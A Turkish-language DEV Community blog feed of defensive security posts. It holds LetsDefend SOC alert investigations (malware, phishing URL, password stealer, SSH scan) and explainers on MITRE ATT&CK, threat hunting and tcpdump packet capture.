DEV Community: YUSIBER

LetsDefend SOC104 - Malware Detected

Teoman Yalçınöz — Sat, 21 May 2022 12:40:16 +0000

Merhabalar, bu yazımızda LetsDefend platformu üzerinde bulunan 84 numaralı event ID'ye sahip SOC104 - Malware Detected uyarısını çözmeye odaklanacağız.

Genel Bakış

Uyarıyı üstlenip case oluşturmadan hemen önce genel bir bakış atacak olursak:
Source Address -> 172.16.17.5
Source Hostname -> SusieHost
Event Time -> March 21, 2021, 1:04 p.m.
File Name -> winrar600.exe
File Hash -> c74862e16bcc2b0e02cadb7ab14e3cd6

bize verilen önemli bilgiler yukarıdakilerdir.

Analiz

verilen IP adresini ve hostnamei Endpoint Management bölümünde araştırıyoruz ve makine karşımıza çıkıyor.

browser , command ve network history bölümlerini kontrol ediyorum fakat herhangi bir bulgu elde edemeyip araştırmaya devam ediyorum.

Verilen hash değerini VirusTotal üzerinde aratıyorum fakat herhangi malicious bir geri dönütle karşılaşmıyorum.

Bize verilen zip dosyasını sanal işletim sistemime indirip kontrol etmek istiyorum.

Ardından zip dosyasının VirusTotal üzerinde aratmak için md5 değerini çıkarıyorum.

Yukarıdaki ekran görüntüsünden de görüleceği gibi herhangi malicious bir bulguyla karşılaşmıyorum ve buna güvenip dosyanın zararsız olduğunu düşünüyorum içini incelemeye geçiyorum.

winrar600 isimli bir exe dosyasıyla karşılaşıyorum. Durumunu incelemek üzere VirusTotal ve Hybrid Analysis platformlarına başvuruyorum.

Yukarıdaki ekran görüntülerinde de gözüktüğü üzere herhangi bir sorun olmadığının geri dönütünü alıyorum.

Fakat exe dosyasını any.run platformu üzerinde çalıştırdığım vakit bana malicious olduğunu geri döndürüyor bu biraz kafamı karıştırıyor.

Playbook

Artık yeteri kadar analiz yaptığımıza göre playbooku da çözüp davayı kapatabiliriz.

Bizden tehdit göstergesini tanımlamamız istenmiş other seçip devam ediyoruz.

Bize zararlının karantinaya alınıp alınmadığını veya temizlendiğini soruyor alınmadı seçip devam ediyoruz.

Bizden malwarei analiz etmemiz istenmiş biz daha önce yukarıda gerekli analizlerimizi yapmıştık non-malicious seçip devam ediyoruz.

Bulgularımızın bazılarını giriyoruz.

Analizi başarılı bir şekilde tamamlıyoruz.

LetsDefend SOC141 - Phishing URL Detected

Teoman Yalçınöz — Sat, 30 Apr 2022 13:09:53 +0000

Merhabalar, bu yazımızda LetsDefend platformu üzerinde bulunan 86 numaralı event ID'ye sahip SOC141 - Phishing URL Detected uyarısını çözmeye odaklanacağız.

Uyarı Detayları

Yukarıdaki ekran görüntüsünde platform tarafından bize verilen uyarı detayları gözükmekte. Bu detayları inceleyip araştırarak bu uyarının bir phishing olup olmadığını araştıracağız. Hemen uyarıyı üstlenerek başlıyoruz.

Uyarıyı üstümüze aldıktan sonra playbooku başlatıp kolları sıvıyoruz.

Veri Toplama

Yukarıdaki isterler uyarı detayında bize verilmişti bunlar:

Source Address — 172.16.17.49
Destination Address — 91.189.114.8
User-Agent — Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36

Log Araştırması

Log araştırması için platform üzerinde bulunan Log Management bölümüne gidip source ve destination IP'leri topladığımız veriler ile filtreliyoruz.

Yukarıdaki ekran görüntülerinde de gözüktüğü üzere proxy tipinde olan log kayıdında bir URL'e ait yapılmış bir istek gözükmekte.
Bu URL :

http[:]//mogagrocol[.]ru/wp-content/plugins/akismet/fv/index.php?email=ellie@letsdefend.io

Not : URL malicious olabileceği için öldürülmüştür, herhangi bir yönlendirme yapmaz.

URL Analizi

Bu aşamada ise bizden çeşitli platformlar üzerinde URL'nin malicious olup olmadığını kontrol etmemiz isteniyor.

AnyRun platformu üzerinde bulduğumuz URL için istek oluşturuyorum ve yukarıdaki ekran görüntüsünde domainin wordpress üzerinde barındırıldığını ve ölü halde gözüküyor olduğunu görüyorum. Daha fazla bilgi edinmek için farklı platformlarda araştırmaya devam ediyorum.

Bu kez VirusTotal üzerinde URL'yi tarattığımda 92 farklı araştırmanın 5'inde malicious olarak tespit edildiğini görüyorum.

Son olarak URLScan üzerinde de araştırdığımda malicious olarak tespit ediliyor.

IP/URL/Etki Alanına Erişen Var mı?

Yukarıdaki sorular hakkında fikir sahibi olabilmek için Hybrid-Analysis aracı üzerinde araştırma yapıp contacted hosts bölümüne bakıyoruz.

Yukarıdaki ekran görüntülerinde bulunan IP adreslerinden URL ile iletişime geçildiğini görüyoruz ve URL'e erişim var mı sorusuna evet yanıtını verip devam ediyoruz.

EDR Sınırlaması

Bizden platform üzerinde bulunan Endpoint Management bölümüne gidip hostun makinesini de sınırlamaya dahil etmemiz istenmiş. Bu isteği yerine getiriyoruz.

Analiz notumuzu ekliyoruz ve uyarıyı kapatıyoruz.

Bu uyarıyı da analiz ettik bir sonrakilerde görüşmek üzere.

MITRE ATT&CK

Teoman Yalçınöz — Fri, 01 Apr 2022 10:07:21 +0000

Gerçek hayatta karşılaştığımız her suçta olduğu gibi , siber suçlarda da saldırganlar gerilerinde iz bırakır ve her iz bir uzlaşma göstergesi (IOC) olarak adlandırılır.IOC , bir siber saldırının gerçekleştiğinin kanıtıdır.Genellikle gerçekleşen saldırı hakkında değerli bilgiler verir. Siber güvenlik mavi takım ekiplerini yani savunucuları gelecekteki olası saldırılara karşı hazırlar ve benzer atak vektörlerine yönelik tespit,önleme,yanıt verme aşamalarında büyük destekçi olur. Fakat her IOC aynı derecede önem arz etmez çeşitli türleri vardır.IOC'lere örnek olarak verecek olursak:

Olağandışı gerçekleşen ağ trafiği
Sistemdeki bilinmeyen dosyalar, uygulamalar ve işlemler
Yönetici veya ayrıcalıklı hesaplarda şüpheli etkinlik
Veritabanı okuma hacmindeki artışlar
Aynı dosya için çok sayıda talep
Olağandışı DNS istekleri
İnsan kaynaklı olmayan web trafiği
DDoS etkinlikleri
Bir kuruluşun iş yapmadığı ülkelerdeki trafik gibi düzensiz etkinlikler IOC2'lere örnek olarak gösterilebilir.

İşte tam da bu nedenden dolayı farklılıklar arası sınıflandırma sistemine ihtiyaç duyulmuştur.

Bilinen IOC sınıflandırma metodlarından The Pyramid of Pain,2013 yılında David Bianco tarafından tanıtıldı.Bianco, piramidin her seviyesinin hem saldırganın hem de güvenlik personelinin hissettiği acıyla orantılı olması nedeniyle piramidi Acı Piramidi olarak adlandırdı. Piramidin üst seviyelerine doğru çıkıldıkça , güvenlik personellerinin IOC'leri toplaması ve uygulaması giderek daha zor daha acı çekici hale geliyor aynı şekilde saldırganların da var olanları yenileriyle değiştirmesi zorlaşıyor. Buna örnek olarak , bir güvenlik personelinin zararlı bir dosyanın hash değerini güvenlik kontrollerine eklemesi veya bu dosyanın geldiği IP'yi tespit edip eklemesi , TTP'leri (Taktik,Teknik,Prosedür) güvenlik kontrollerine tanımlamasından daha kolay ve basittir. Aynı şekilde saldırganın , zararlı içeren bir dosyanın hash değerini değiştirmesi oldukça basit ancak TTP'lerini değiştirmesi oldukça zor ve maliyetlidir.

MITRE ATT&CK NEDİR ?

MITRE ATT&CK çerçevesi TTP'leri sistematik olarak tanımlar ve organize eder.Siber saldırganların kullandıkları atak vektörlerinin gerçek dünyadaki gözlemlerine dayanan,dünya çapında erişilebilir ve kullanılabilir bilgi tabanıdır. Siber güvenlik ekiplerince yaygın kullanışını TTP'leri tanımlamak olarak söyleyebiliriz.

ENTERPRISE İÇİN MITRE ATT&CK MATRİSİ NEDİR ?

ATT&CK MATRIX
Yukarıdaki resimde ve linkte görülen Enterprise için MITRE ATT&CK Matrisidir.Bu matris özelinde konuşacak olursak her sütun bir "TAKTİĞİ" temsil eder. Bu taktiklere ulaşmak için siber saldırganlar "TEKNİKLER" adı verilen farklı yöntemler kullanırlar. Örnek vermek gerekirse, ilk sütundaki "DÜŞMAN KİMLİĞİ İLE İLGİLİ BİLGİ TOPLAMA" taktiğini uygulamak için "Phishing saldırısı" tekniğini kullanabilir.Enterprise için ATT&CK matrisinin en iyi yönlerinden biri de sürekli güncelleniyor olmasıdır asla statik kalmamaktadır. Yeni keşfedilen taktik ve tekniklerle birlikte güncellenir. Şuanda da 14 taktik, 185 teknik ve 367 alt teknik içermektedir. MITRE ATT&CK ayrıca bir saldırı faaliyeti ile ilgili siber tehdit gruplarını içermesinin yanı sıra bu siber tehdit grupları tarafından kullanılan yazılımları da sağlar. Şu anda ATT&CK, 122 grup ve 585 yazılım içermektedir.MITRE ATT&CK, siber güvenlik ekiplerine yardımcı olmak için meta veriler, prosedürler, algılamalar ve azaltmalar gibi çok değerli bilgiler sağlar.

MITRE ATT&CK'ı OPERASYONEL HALE GETİRME ?

Siber tehdit istihbaratı kaynağı olarak ATT&CK Framework kullanılabilir.Siber tehdit istihbaratının ne olduğunu daha önceki yazılarımda açıklamıştım. Temel manada saldırganlara yönelik bilgilerin toplanmasını içeren tehdit istihbaratı bunun için MITRE ATT&CK Framework'ünden yararlanabilir. ATT&CK, siber saldırganların amaçlarını bu saldırıyı uygularkenki motivasyonlarını , hedefledikleri ülkeler ve sektörleri , kullandıkları teknik, taktik ve araçları ortaya çıkararak saldırganların davranışını kavramada büyük rol oynar. Kurum veya kuruluşların sahip olduğu siber güvenlik ekiplerinin olgunluk düzeyi ne olursa olsun , ATT&CK matrisi herhangi bir kuruluşa yardımcı olabilir. Örnek olarak sadece birkaç analist barındıran bir kuruluş istihbarat , kendi kuruluşunun bulunduğu sektörü ve ülkesini hedefleyen bir tehdit grubu ile başlar. Ardından tehdit grubunun kullandığı teknikleri ATT&CK'da yapılandırıldığı gibi inceler. Mesela kuruluşumuzun Türkiye merkezli olduğunu varsayalım. MITRE ATT&CK ana sayfasına gidip "turkey" anahtar kelimesi ile arattığımızda . Ülkemizi hedef alan birkaç siber tehdit grubu buluyorum.

CopyKittens tehdit grubu, en az 2013'ten beri faaliyet gösteren İranlı bir siber casus grubu imiş. Dolayısıyla, bu grup organizasyonumuzla çok alakalı. İlk başta, web sitesinde gruplar sayfasını göstermek istiyorum.

Şu anda ATT&CK Çerçevesinde 122 grup bulunmaktadır.MITRE ATT&CK websitesi üzerinde CopyKittens grubu ile ilgili bilgilere göz atalım.

Ekranda görüldüğü gibi ATT&CK, grubun, hedeflenen coğrafyaların ve hedeflenen sektörlerin atıflarını sağlar. CopyKittens grubunun İran'a atfedildiğini, hedeflenen bölgelerin İsrail, Suudi Arabistan, Türkiye, Almanya olduğunu ve Solmuş Lale Operasyonu olarak bilinen kampanyadan sorumlu olduğunu öğreniyoruz. Grubun sayfasından , kullandıkları tekniklere ve yazılımlara bakarak onlar hakkında daha fazla şey keşfedebiliriz.

MITRE ATT&CK , grup tarafından kullanılan teknikleri ufak özetlerle açıklar. Ayrıca ATT&CK , grubun kullandığı teknikleri ATT&CK Navigator kısmında görselleştirir. Mavi teknikler, tehdit grubunun kullandığı teknikleri gösterir.

MITRE ATT&CK platformunda kullanılan her tekniğin T1003 gibi 4 basamaklı benzersiz bir kimliği vardır.

Tehdit gruplarında olduğu gibi tehdit gruplarının kullandığı yazılımlarda da benzer analizler yapılabilir. Yine software sayfasına tıklayarak genel bakış yapıyorum.

Ardından örnek olması açısından BabyShark yazılımına tıklayıp hakkında detaylı bilgi almak istiyorum.

Genel özete baktığımızda BabyShark'ın, birkaç Kuzey Kore kampanyasıyla ilişkili olduğuna inanılan bir Microsoft Visual Basic (VB) komut dosyası tabanlı kötü amaçlı yazılım ailesi olduğunu öğreniyoruz. Hemen yanda az önce bahsettiğimiz eşşiz ID'sinin S0414 olduğunu ve tipinin malware olduğunu görüyoruz. Hemen aşağıda BabyShark yazılımının beraberinde kullanıldığı teknikleri görebiliyoruz.

Mesela komut ve komut dosyası yorumlayıcısı ve dosya, dizin bulma teknikleri ile kullanılmış. Daha detaylı bakmak istediğimizde tıpkı tehdit gruplarında olduğu gibi ATT&CK Navigator'ü kullanıyoruz.

Sonuç

Genel olarak, MITRE ATT&CK'nin siber güvenlik personelleri için çok iyi bir rehberlik sağladığını ve onları doğru yola soktuğunu söylemek doğru olur.ATT&CK Framework taktikler, teknikler, prosedürler, azaltma, tespit, tehdit grupları ve saldırı araçları hakkında bilgi sağlar.Ancak MITRE ATT&CK'ın operasyonel hale getirilmesi açısından, belirli zorluklar ve atılması gereken bazı ek adımlar vardır. En basitinden örnek verecek olursak, yetenekli personel ve güçlü insan kaynağına sahip sınıflandırılmış takımlar ve bu takımlar arasında güçlü işbirliği gerektirir. (CTI,SOC,Red Team,SecOps gibi)

Yararlanılan Kaynaklar

https://www.siberguvenlik.web.tr/index.php/2021/02/12/indicator-of-compromiseioc-nedir/

https://www.logsign.com/blog/what-is-mitre-attack-framework/

https://medium.com/mii-cybersec/introduction-mitre-att-ck-framework-part-1-english-28f32bd8fc90

https://attack.mitre.org/

https://medium.com/mitre-attack

LetsDefend SOC143 - Password Stealer Detected

Teoman Yalçınöz — Sun, 20 Mar 2022 11:09:49 +0000

Merhabalar , bu yazımızda LetsDefend platformu üzerinde bulunan SOC143 - Password Stealer Detected isimli event ID'si 90 olan davayı ele alacağız. LetsDefend platformundan ve mavi takım operasyonları bakımından yararlarından daha önceki yazıda bahsetmiştik. Başlamadan hemen önce bu uyarının gerçek bir siber saldırıda kullanıldığını belirtmek istiyorum.Davayı üstlenerek başlayalım.

Genel itibariyle bakacak olursak. Olay April 26, 2021, 11:03 p.m. tarihinde gerçekleşmiş. 180.76.101.229 nolu IP adresinden bill@microsoft.com kullanıcısından ellie@letsdefend.io isimli kullanıcıya gönderilen bir mail içeriyor. Cihaz eylemi kabul edilirken, mailin içeriği ve konusu belirtilmemiş bizden araştırmamız beklenmiş. Öncelikle bilgi olarak bize sunulan IP adresini farklı platformlarda aratıp bilgi edinmeye çalışıyoruz.

Cisco Talos, AbuseIPDB vb. çeşitli platformalarda arattık. Edindiğimiz bilgilere göre IP Çin çıkışlı, Beijing merkezli bir providera ait. Şimdi ise LetsDefend platformunda bulunan mailbox bölümüne geçiş yapıyoruz ve mail hareketliliğini araştırmaya başlıyoruz.

Mailbox -> Inbox sekmesinde source olan bill@microsoft.com u veyahutta tarihi filtreleyip maili kontrol ediyoruz.

Mail içeriğini inceleyecek olursak herhangi bir metin veya başlık belirtilmeden yalnızca bir .zip dosyayıyla karşılaşıyoruz.Karşılaştığımız bu .zip dosyasını Hybrid Analysis, VirusTotal gibi platformlarda araştırıp "Zararlı herhangi bir şey içeriyor mu ?","Daha önceki kayıtlarda zararlı bir durumla karşılaşılmış mı?" gibi sorulara yanıt arıyoruz.

VirusTotal platformunda arattığımızda 91 farklı aramanın sadece 1 tanesinde şüpheli olduğuna kanaat getirildiğini görüyoruz.

Hybrid Analysis'de arattığımızda ise malicious olarak bildirilen durumlarla karşılaşıyoruz.

Bu durumları detaylı incelediğimiz vakit içinde barındırdığı dosyanın malware olarak bildirildiğini görüyoruz.Tüm bu riskleri göz önünde bulundurarak .zip dosyasını sanal makinemiz olan Kali Linux'a indirip inceliyoruz.

İndirip bize verilen infected parolasıyla birlikte dosyayı dışarı çıkarıyoruz ardından .zip dosyasından çıkan HTML dosyasını kontrol etmek üzere VirusTotal ve Hybrid Analysis'e başvuruyoruz.

Dosyayı kontrol edebilmek için md5sum yardımı ile dosyamısın MD5 ını buluyoruz.

Yukarıda görüldüğü üzere HTML dosyamız farklı platformlarda ağırlıklı olarak malicious olarak bildirilmiş.

Hybrid Analysis'de detaylı olarak incelediğimizde alınan ekran görüntülerinde bir login paneli olduğunu görüyoruz ve phishingden şüpheleniyoruz. Bu şüphelerimizi doğrulamak için bize güvenli ortam sağlayan any.run platformu üzerinde HTML dosyasını açıyoruz.

Dosyayı açtıktan sonra gerçekten de görüldüğü üzere bizi bir login ekranı karşıladı.

URL'yi VirusTotal'de aratmamızın ardından pek çok kez malicious ve phishin olduğuna kanaat getirildiğini görüyoruz. Login ekranından aldığı parola bilgisini ilettiği uç noktada saklayıp kişisel bilgileri çalan bir çeşit phishing saldırısı olduğunu anlıyoruz. Hatta bu seferki kurban direkt kendi adına uygulanan bir spear phishing saldırısı ile karşı karşıya. Herşeyin ardından edindiğimiz bu bilgilerin ışığında davayı sonlandırmak üzere playbooku açıyoruz.

İlk soruya dosya bir URL içerdiği için evet yanıtını veriyoruz.

İkinci soruda VirusTotal,Hybrid Analysis vb sitelerde aratıp malicious durumlarla karşılaştığımız için malicious yanıtını veriyoruz.

Mail teslim edildiği için delivered işaretliyoruz.

Elde ettiğimiz verileri girmemiz için bize verilen bölümü dolduruyoruz ve playbooku tamamlıyoruz.

Yorumumuzu yapıp davayı başarılı bir şekilde kapatıyoruz.

Cyber Threat Hunting

Teoman Yalçınöz — Sat, 19 Mar 2022 14:31:42 +0000

Bu yazımızda Cyber Threat Hunting (Siber Tehdit Avcılığı) den bahsedicez. Tehdit Avcılığı; kötü niyetli faaliyetlerin ve siber tehditlerin hipoteze dayalı olarak keşfedilip raporlanmasını ele alan süreçtir. Saldırıyı olabildiğince erken tespit etmeyi ve minimum kayıp yaşanmasını amaçlar.
Yani tehdit avcılığını :

Şirket veya kurumun ağındaki ve sistemlerindeki tehditleri proaktif olarak belirlemek.
Çevreyi halihazırda tehlikeye atan etkisi altına almış tehditleri bulmak.
Mevcut tehdit algılama ve önleme çözümlerinden kaçan gelişmiş tehditleri algılamak gibi özetleyebiliriz.

Tehdit avı sırasında öncelikle bir gidiş yolu bir hipotez oluşturulur ve sonrasında bu hipotez araştırılır. Bir tehdit avı sırasında yeni TTP ve IOC'leri ortaya çıkarabilirsiniz. TTP, herhangi bir tehdit aktörünün davranışı olarak tanımlanabilir. Teknik, taktik ve prosedürden oluşur. TTP'de amaç, tehdit aktörleri tarafından kullanılan gidiş yolu, belirli stratejiler ve tehdit vektörlerine karşı koyabilmek için saldırının davranışının kalıplarını çıkarmaktır. Bir IOC(Indicator of Compromise) ise bir bilgisayarda veya herhangi bir cihazda güvenlik ihlaline işaret eden terimdir. IOC verileri, herhangi şüpheli bir güvenlik olayı veya ağdaki beklenmeyen bir faaliyet olabilir. Misalen; yönetici hesaplarda şüpheli etkinlik, veritabanı okumasındaki artış miktarı, beklenmedik sistem yamaları, DDoS etkinliği olabilir.
Edindiğimiz bu yeni TTP ve IOC'lerden yeni algılama kuralları oluşturabilir veya direkt olarak Olay Müdahale ekiplerince müdahahele edilebilir. Mesela uç noktada tehdit avcılığı ekibi tarafından tespit edilen bir malwarea ait TTP ve IOC'leri ortaya çıkarmak için Malware analiz ekibine iletmesi.

Kurum ve kuruluşların pek çoğu siber tehdit avcılığı süreci kısmında hataya düşüyor.Birçoğu resmi olarak tehdit avı sürecine sahip değil ve çok az bir kısmı ise tehdit avcılığı için yetişmiş ve atanmış çalışanlar ile resmi ilerleme metodolojisine sahip.Kurumlarda çalışan tehdit avcılarının çoğu adli bilişim, olay müdahelesi, SOC uygulamaları gibi farklı görevleri de yerine getiren personellerden oluşuyor.İşte tam da bu noktada tehdit avcılığı sürecinin verimsizliği ve yetersizliği baş gösteriyor. Kurumlar, yeterli insan kaynağına sahip olmadığından,zaman yönetimi başarısızlığıyla birlikte geçici çözümler üretilip tehdit avcılığı operasyonu gerçekleştiriliyor. Bu sorunlardan sıyrılmak için yeterli insan kaynağı bulunan bir ekiple, belirli bir sistem ve metodolojiye bağlı kalarak bir siber tehdit avcılığı yaklaşımı belirlenmelidir.

Tehdit Avcılığı Yaşam Döngüsü

Zaman zaman farklılık gösterse de tehdit avcılığında dört ana adım vardır. Birincisi hipotez oluşturmaktır. Tehdit avcısı bu hipotezi analiz edip bir saldırı senaryosu oluşturmalıdır. İkincisi araştırma yapmaktır. Ekibin bu aşamada yapması gereken belirlenen hipotezi araştırıp detaylandırmaktır. Daha sonrasında ise hipotezi kanıtlayacaktır ya da çürütecektir. Üçüncü aşama ise ortaya çıkarma aşamasıdır. Tehdit avı döngüsünün bu aşamasında tehdit aktörünün saldırılarını gerçekleştirmek için kullandığı TTP'leri bulunur. Son aşama ise bilgilendirme ve zenginleştirmedir. Şimdi tehdit avcılığı döngüsünün her bir adımını tek tek ele alalım.

1. HİPOTEZ OLUŞTURMA :

Hipotezler , belirli bir tehdit aktörünün veya tekniğin tespit edilmesi , çalışılan kurumun altyapısının sahip olduğu tehdit açıklarının kapatılması gibi avın odağını tanımlayan sorulardır.Bu adımda avcı ekip "tehdit aktörünün amacı nedir?","tehdit aktörü kurumun ağına nasıl sızar", "sızarken nelerden faydalanabilir"gibi sorular sorarlar.Belirlenen hipotez test edilebilir, üzerinde oynanabilir olmalıdır.Hipotez oluşururken farklı yaklaşımlar kullanılır.Bunlardan biri tehdit istihbaratı yardımıyla oluşturulan hipotezler ; bu tür hipotezler , siber tehdit istihbaratı ekiplerince oluşturalan sorular , elde edilen veriler ışığında oluşturulur.Başka bir yaklaşım türü ise durumsal farkındalık odaklı hipotez oluşturmadır.Bu yaklaşımda , ekip çevrelerinin durumsal bakımdan farkında olmalı ve çevrelerinde meydana gelen bir değişim durumunda bu değişim hakkında hipotez geliştirmelidir.Bunu yaparken çevre materyallerinden en fazla kritik öneme sahip olanlara odaklanabilirler.Başka bir yaklaşım türü olarak alan uzmanlığına dayalı hipotez oluşturmayı örnek verebiliriz.Durumsal farkındalık yaklaşımına benzerdir ve avcının alan uzmanlığı ile ilgilidir.Tecrübeye ve farkındalığa dayalıdır.

2. ARAŞTIRMA :

Bu aşamada elimizde oluşturulmuş hipotezin olduğunu ve nasıl test edebileceğimizi biliyoruz. Amaç, çeşitli araç ve teknikleri kullanarak hipotezi derinlemesine araştırıp analiz etmek ve sonrasında hipotezi çürütmek veya kanıtlamaktır.Yani tehditin avlandığı adım olarak adlandırabiliriz. Tabii ki avcı ekip, avlanma süreci başlamadan evvel yeterli veri kaynağına sahip olmalı, gerekli veri görünürlüğüne sahip olmalı. Bu veriler çeşitli araçlar ve yardımcı kaynaklar tarafından sağlanabilir.MITRE ATT&CK, tehditi avlamak için gereken üst düzey veri kaynaklarının adlarını sağlayabilir. Bütün bunların ardından ilerleme yolumuz belli , gerekli loglara ve veri kaynaklarına sahibiz. Yani avlanma süreci için hazır duruma geliriz.

3. ORTAYA ÇIKARMA :

Üçüncü aşama olan ortaya çıkarma aşamasında amacımız ise yeni TTP(taktik,teknik,prosedür)'leri ortaya çıkarıp yeni tehdit kalıplarını oluşturmak.

4. BİLGİLENDİRME VE ZENGİNLEŞTİRME :

Tehdit avcılığı döngüsünün son aşaması olan analitiğin bilgilendirilmesi ve zenginleştirilmesi aşaması, yeni bir ava başlamadan önce mevcut sonlanan av sürecini proaktif bir şekilde operasyonel hale getirmeyi amaçlar.Aynı tehdit üzerinde takılı kalıp defalarca kez aynı tehditi araştırıp avlamayı istemeyiz.İşte tam bu noktada bilgilendirme ve zenginleştirme aşaması mümkünse otomatik algılama kurallarına dönüştürüp gelecekte aynı tehditi tekrar aramayı engeller.Böylece aynı tehdit üzerinde zaman kaybı yaşamadan farklı hipotezleri test etmeye bolca zaman bulabilirsiniz.

Sonuç

Sonuç olarak, siber tehdit avcılığı kuruluşlar için basite alınması ve gözardı edilmesi gereken bir süreç değil, tam aksine bir zorunluluktur ve plan program dahilinde kapsamlı bir şekilde yeterli insan kaynağıyla yürütülmesi gerekir.

Yararlanılan Kaynaklar

LetsDefend SOC 147 - SSH Scan Activity

Teoman Yalçınöz — Tue, 01 Mar 2022 22:05:05 +0000

Siber güvenlikte kırmızı takım olarak adlandırdığımız ofansif tarafta birçok eğitim kaynağı ve pratik yapılabilecek platform bulunurken, mavi takım olarak adlandırdığımız savunma tarafında mavi takım adaylarının kendilerini geliştirip birşeyler katabileceği kaliteli eğitim materyallerinin olmaması ve pratik yapabilecekleri platformun olmaması sorunlarını buluyor. LetsDefend adlı platform da bu soruna çare olarak mavi takım adayları için büyük önem arz ediyor. Platform , içinde barındırdığı çeşitli senaryolar ile adayların daha önceki deneyimlerini gerçek bir vaka karşısında kullanabilmeleri için çeşitli vakalar göstererek deneyim kazanmaları amaçlıyor.

Bu yazımızda ise LetsDefend platformunda bulunan SOC 147 - SSH Scan Activity isimli uyarıyı ele alacağız.

Başlarken ilk aşamada yapmamız gereken şey davayı üstlendiğimizi belirtmek.

Uyarı detaylarını incelediğimizde bize bir .zip dosyası ve bu .zip dosyasının şifresini verdiğini görüyoruz.Hemen ardından bu zip uzantılı dosyası Kali Linux sanal makinemize indirip incelemeye başlıyoruz.

.zip dosyasını açtıktan sonra içinden nmap isimli bir dosyanın çıktığını görüyoruz.Daha sonra file komutunu kullanarak bu dosyanın özellikleri hakkında fikir sahibi olmayı deniyoruz.

ardından bu dosyanın GNU/Linux 3.2.0 versiyonlu 64 bit Linux üzerinde çalıştırılan binary bir dosya olduğunu öğreniyoruz. Fakat bu dosyamızın zararlı yazılım içerip içermediğini bilmiyoruz. İşte bu yüzden dosyamızın md5 hashini bulmak üzere md5sum komutunu kullanıyoruz.

Bulduğumuz bu md5 değerini Virustotal , Metadefender vb sandbox ortamlarında bu dosyanın tam olarak ne olduğunu , zararlı olup olmadığını analiz etmek üzere aratıyoruz.

Virustotal'de yaptığımız kontrolün ardından bize döndürdüğü verilere göre dosyamızın md5 değeri 60 farklı platformda yapılan kontrolle birlikte herhangi tehdit oluşturabilecek bir şey içermiyor.Şimdilik bu edindiğimiz bilgiler bize yeterli.Ardından LetsDefend üzerinden Log Management kısmını incelemek üzere bu kısıma geçiyoruz.

uyarı detayları kısmında bize bilgi olarak verilen IP adresine göre filtreleme yapıp sadece bu IP adresine ait olan logları ele alıyoruz.Yine uyarı detayları kısmında bize verilen bilgiye dayanarak Jun, 13, 2021, 04:23 PM tarihindeki logları filtreliyoruz.Bu filtrelemeyle birlikte 172.16.20.0/24 ağında bulunan makinelerin 22 yani SSH portlarına yönelik kayıtlar önümüze sıralanıyor.

Bu edindiğimiz bilgilerin ardından Endpoint Security bölümüne geliyoruz ve 172.16.20.5 IP adresi ile arama yapıyoruz.

ve yukarada da gördüğünüz gibi bize parametre olarak verdiğimiz IP adresine yönelik genel ve detay bilgiler veriyor.

komut satırı geçmişine bakarak çalıştırılan nmap komutunu inceleyebiliyoruz.Bu veriye göre 172.16.20./24 ağında bulunan bilgisayarlara nmap ile versiyon taraması yapıldığını öğreniyoruz.

proses geçmişi kısmına bakarak yine netcat , python ve nmap proseslerinin ve dahasının çalıştırıldığı bilgisine ulaşabiliyoruz.
Edindiğimiz bu bilgilerin ışığında artık davayı sonuçlandırma kısmına geçiyoruz ve playbook ile devam ediyoruz.

tehdit ayrıştırıcımız verilen opsiyonlara uymadığından diğerleri seçeğini belirleyip geçiyoruz.

şimdiki durumda ise herhangi bir karantinaya alma ve temizleme durumu olmadığından not quarantined seçeneğini seçip ilerliyoruz.

son durumda ise yaptığımız analizlerin ardından zararlı olarak nitelendirilebilecek herhangi bir durumla karşılaşmadığımız için non-malicious seçeğenini seçip playbooku tamamlıyoruz.Playbooku tamamladıktan sonra ise uyarıyı kapatmak üzere Monitoring bölümüne geçiyoruz.

Uyarıyı false positive olarak bildirip , kapatmak üzere raporumuzu yazıyoruz.

tcpdump İle Ağ Analizi

Teoman Yalçınöz — Sun, 13 Feb 2022 13:40:20 +0000

Daha önceki yazılarda Wireshark aracının ne olduğunu ve hangi amaçlarla kullanıldığına değinip çeşitli ağ içi analizler yapmıştık.

Bu yazımızda ise tcpdump'ı inceleyeceğiz.tcpdump,Linux/UNIX sistemlerde komut satırında çalıştırabileceğimiz açık kaynaklı ücretsiz bir paket yakalama ve analiz aracıdır.Wireshark aracının bize sunduklarına benzer olarak tcpdump bizlere,ait olduğumuz ağ üstünde iletilen veya alınan TCP/IP paketlerini veya diğer paketlerin yakalanıp kaydedilmesi , incelenmesi , filtrelenmesi gibi imkanlar sunar. Ayrıca tcpdump'ın Windows için olanı WinDump olarak adlandırılır.

Her ne kadar çoğu Linux/UNIX dağıtımında yerleşik olarak bulunsa da which tcpdump komutu ile sisteminizde halihazırda kurulu olup olmadığını kontrol edebilirsiniz.

Kurulu değilse apt-get install tcpdump komutu ile paket yöneticisi vasıtasıyla tcpdump'ı kurabilirsiniz.

tcpdump -h ile tcpdump aracının parametrelerine ve işlevlerine göz atabilirsiniz.

Yine genel olarak göz atacak olursak tcpdump parametrelerini aşağıdaki gibi sıralayabiliriz.

tcpdump komutunu yazarak başlıyoruz.

yukarıda gördüğünüz gibi komutu girer girmez ağ üzerinde akan paketleri yakalamaya başlayıp terminal ekranında görüntülemeye başladık.Şimdi ise ping göndermeyi deneyerek ICMP paketlerinin analizini yapmaya çalışalım.

sağdaki terminal ekranında tcpdump aracıyla yakaladığımız ICMP request ve reply paketleri görünmekte.Bu şekilde ürettiğimiz çıktıyı daha sonra analiz etmek üzere bir dosyaya yazırmak istersek -w parametresini eklemeliyiz.

Yine aynı şekilde daha önceden kaydedilen bir dosyayı tcpdump ile tekrar analiz etmek istediğimizde -r parametresiniz eklemeliyiz.

IP Filtrelemesi

tcpdump host <YOUR_IP_ADD> komutu ile parametre olarak verilen IP 'ye göre filtreleyip sadece bu IP'ye ait olan trafiği yakalayabilirsiniz.

tcpdump src host <YOUR_IP_ADD> ile belirtilen IP'den giden
tcpdump dst host <YOUR_IP_ADD> ile belirtilen IP'ye gelen trafiği analiz edebilirsiniz.

Apache2 Uygulaması

Şimdiki uygulamamızda Kali Linux'ta yerleşik olarak bulunan Apache2 web sunucusunu service apache2 start komutu ile başlatıyoruz.

Daha sonra tcpdump ile paket yakalama işlemini başlatıyoruz. Ardından Windows makinemizin web tarayıcısına halihazırda çalıştırmakda olduğumuz Sanal Kali Linux'un IP adresini giriyoruz.

Yukarıda görüldüğü gibi tcpdump terminal ekranında paketleri yakalamaya başlıyoruz.Bu paketler üzerinde işaretlenen flag noktaları TCP 3 yönlü el sıkışmayı belirtir.

Port Filtrelemesi

